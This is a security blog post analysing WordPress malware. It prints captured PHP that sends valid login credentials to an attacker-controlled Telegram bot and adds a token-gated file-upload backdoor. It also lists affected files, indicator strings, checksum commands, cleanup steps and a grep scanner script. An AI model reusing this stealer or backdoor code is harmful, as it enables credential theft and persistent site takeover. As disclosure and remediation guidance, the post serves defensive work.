We have noticed a number of WordPress websites infected by a new malware that uses the Telegram Bot API to steal private information (the username and password of every successful login, administrators included), post it to an attacker-controlled Telegram chat and store it in a remote database.
Here is the malicious code that is being injected. The listing is reproduced as captured: the bot tokens are partly redacted, and the two calls inside the catch blocks are cut off in our copy at "urlencode$".

```php
try {
    $bajatax_x9 = apply_filters('wp_authenticate_user', $user, $password);
    if (wp_check_password($password, $bajatax_x9->user_pass, $bajatax_x9->ID)) {
        if (!empty($username) and !empty($password)) {
            $message852 = "bajatax|:|:|" . $username . "|:|:|" . $password . "|:|:|" . $_SERVER['REMOTE_ADDR'] . "|:|:|" . $_SERVER['SERVER_NAME'] . "|:|:|";
            file_get_contents("https://api.telegram.org/xxxxxxxxx:AAEg61uHS7H7lRnf9jA27cmahncSl8NMuvI/sendMessage?chat_id=1110165405&text=" . urlencode($message852) . "");
        }
    }
} catch (Exception $e) {
    if (function_exists("file_get_contents")) {
        try {
            file_get_contents("https://api.telegram.org/xxxxxxxxx:AAE1-wpQyYquqvB7wOeBzzmPafEp0d81e6c/sendMessage?chat_id=1110165405&text=" . urlencode$
            file_get_contents("https://api.telegram.org/xxxxxxxxx:AAE1-wpQyYquqvB7wOeBzzmPafEp0d81e6c/sendMessage?chat_id=1110165405&text=" . urlencode$
        } catch (Exception $e2) {}
    }
}
```

The first block sits next to WordPress' own password check in the login path. It re-runs wp_check_password() on the submitted credentials and, only when they are valid, sends the username, password, client IP address and host name to a Telegram bot with file_get_contents(). Failed logins are not reported, so the attacker receives only working credentials.

```php
try {
    if ($_POST['action'] == "wp_ajax_try_2020_v2") {
        if (!empty($_FILES['file']) and md5(md5(md5($_POST['token_admin']))) == "015c38c46597c483b6186e4a40aad4bf") {
            @move_uploaded_file($_FILES['file']['tmp_name'], "../" . $_FILES['file']['name']);
            echo " file name : " . $_FILES['file']['name'];
        } else {
            die(0);
        }
        exit();
    }
} catch (Exception $e) {
    if (function_exists("file_get_contents")) {
        try {
            file_get_contents("https://api.telegram.org/xxxxxxxx:AAE1-wpQyYquqvB7wOeBzzmPafEp0d81e6c/sendMessage?chat_id=1110165405&text=" . urlencode$
            file_get_contents("https://api.telegram.org/xxxxxxxxx:AAE1-wpQyYquqvB7wOeBzzmPafEp0d81e6c/sendMessage?chat_id=1110165405&text=" . urlencode$
        } catch (Exception $e2) {}
    }
}
```

The second block is an upload backdoor. A POST request with action=wp_ajax_try_2020_v2 and a token_admin value whose triple MD5 matches the hard-coded hash causes the uploaded file to be moved, under its attacker-supplied name, into the directory above the running script (typically the site root when the host file is wp-admin/admin-ajax.php). Any PHP file dropped this way gives the attacker a web shell that survives a password reset.
The malware is infecting WordPress core files and the "File Manager" and "WooCommerce" plugins for now, including the latest versions of WordPress (5.5) and WooCommerce (4.4.1) at the time of writing. The files we have seen modified are:
- wp-includes/user.php
- wp-admin/admin-ajax.php
- wp-file-manager/lib/files/HhGFXU.php (and other randomly named .php files)
- woocommerce/includes/wc-user-functions.php
- woocommerce/includes/class-wc-form-handler.php
Strings that help determine whether a site is compromised are:
- "bajatax"
- "api.telegram.org"
- "wp_ajax_try_2020_v2"
- the Telegram chat ID "1110165405"
Because the code is plain PHP rather than encoded or obfuscated, signature-based scanning in security plugins such as Wordfence or Sucuri may not flag it, so manual inspection is advised. Modified core and plugin files do, however, show up in a checksum comparison against the official releases, for example with WP-CLI: wp core verify-checksums and wp plugin verify-checksums --all.
Steps to resolve
The basic fix is to replace all WordPress core files with clean wp-admin and wp-includes folders from the official download, and to reinstall the WooCommerce and WP File Manager plugins from fresh copies. Always take a backup before attempting this.
Because the malware only reports credentials that passed the password check, treat every password used to log in while the site was infected as stolen and reset it, administrators first. Also look in the site root and the plugin directories for recently added PHP files with unfamiliar names, since the upload backdoor writes attacker-named files there.
After cleanup there should be no references to the strings above anywhere in the website's files or database (the only legitimate exception is "api.telegram.org" when the official Telegram plugin is in use).
Lastly, check for newly created WordPress users that may have been injected into the database, for example with wp user list --role=administrator or the Users screen in the admin area.
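The file search from the steps above, as an added example that is not part of the original article: a POSIX shell script that lists every PHP file under a WordPress install containing any of the indicator strings. The indicator strings and the directory names are taken from this post; the function names and the sample files are our own.

```sh
#!/bin/sh
# Added example (not the original article's code): find PHP files carrying the
# bajatax indicators. Assumes a POSIX sh with find and grep available.
# Usage: sh scan_bajatax.sh /var/www/html

# Indicator strings from the injected code shown above. "api.telegram.org" is
# also used by the official Telegram plugin, so review hits in that plugin by hand.
INDICATORS='bajatax|api\.telegram\.org|wp_ajax_try_2020_v2|token_admin'

# Print the path of every .php file under $1 that contains any indicator.
# find returns non-zero when grep matched nothing; the list is the result
# we care about, so that status is discarded.
scan_for_bajatax() {
    find "$1" -type f -name '*.php' -exec grep -lE "$INDICATORS" {} + 2>/dev/null || true
}

# Number of flagged files, convenient for a cron job that alerts on non-zero.
count_bajatax_hits() {
    scan_for_bajatax "$1" | wc -l | tr -d ' '
}

if [ -n "$1" ]; then
    hits=$(count_bajatax_hits "$1")
    scan_for_bajatax "$1"
    echo "files flagged: $hits"
    # Exit non-zero when anything was found so the job fails visibly.
    [ "$hits" -eq 0 ]
fi
```

Run it against the web root and compare the list with the affected-file list above; then confirm the remaining files with wp core verify-checksums, since the string search only catches this variant's markers, not every possible modification.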
As always, we're here to help if you need assistance cleaning your website and implementing additional security measures. If your site has been infected, feel free to contact us and we can help ASAP. Follow @fixed_net on Twitter for future updates.

Panos Kesisis